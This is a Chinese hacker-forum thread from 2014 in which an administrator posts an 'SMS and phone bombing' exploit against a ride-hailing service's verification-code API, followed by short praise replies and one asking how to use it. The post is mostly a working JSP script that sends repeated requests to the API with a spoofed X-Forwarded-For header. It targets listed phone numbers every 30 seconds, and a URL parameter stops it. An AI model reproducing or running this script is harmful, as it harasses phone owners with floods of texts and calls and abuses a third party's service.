搜索
查看: 468|回复: 3

某XXX短信和电话轰炸漏洞

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2014-2-3 07:46:09 | 显示全部楼层 |阅读模式
某XXX短信验证码未做次数和安全校验漏洞,每请求一次便会自动发一封短信而且打一个电话。
利用代码:

  1. <%@ page language="java" pageEncoding="UTF-8"%>
  2. <%@ page isThreadSafe="false" %>
  3. <%@ page import="java.io.OutputStreamWriter"%>
  4. <%@ page import="java.net.URLConnection"%>
  5. <%@ page import="java.net.URL"%>
  6. <%@ page import="java.util.*"%>
  7. <%!
  8.     private static Timer t = new Timer();
  9.     void test(){
  10.       String[] str = "1321344xxx,134555455xxxx".split(",");//手机号,分开
  11.       for(String s:str){
  12.       try{
  13.       URLConnection u = new URL("http://www.kuaidadi.com/phone/api.php").openConnection();
  14.       u.setDoInput(true);
  15.       u.setDoOutput(true);
  16.       u.setConnectTimeout(3000);
  17.       u.setReadTimeout(3000);
  18.       u.setRequestProperty("x-forwarded-for", "12.34.12.34");
  19.       OutputStreamWriter osw = new OutputStreamWriter(u.getOutputStream(), "UTF-8");
  20.       osw.write("mobile="+s+"&act=get_verify_code&sourceid=11");
  21.       osw.flush();
  22.       osw.close();
  23.       u.getOutputStream();
  24.       u.getInputStream();
  25.       }catch(Exception e){
  26.       }
  27.       }
  28.     }
  29.    
  30.     void startX(){
  31.       t.schedule(new java.util.TimerTask() {
  32.       public void run() {
  33.       test();
  34.       }
  35.       }, 0, 30000);
  36.     }
  37. %>
  38. <%
  39.     try{
  40.       if("cancel".equals(request.getParameter("action"))){
  41.       t.cancel();
  42.       out.println("stop....");
  43.       }else{
  44.       t = new Timer();
  45.       startX();
  46.       }
  47.     }catch(Exception e){
  48.       out.println(e.toString());
  49.     }
  50. %>
复制代码

如果想停止发送:http://www.xxx.cn/sm.jsp?action=cancel
过段时间可能会取消签到功能了
854955425 该用户已被删除
发表于 2014-2-3 07:58:39 | 显示全部楼层
好好 学习了 确实不错
854955425 该用户已被删除
发表于 2014-2-3 08:03:43 | 显示全部楼层
没看完~~~~~~ 先顶,好同志
尐徫 该用户已被删除
发表于 2014-3-14 13:59:52 | 显示全部楼层
怎么使用啊
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表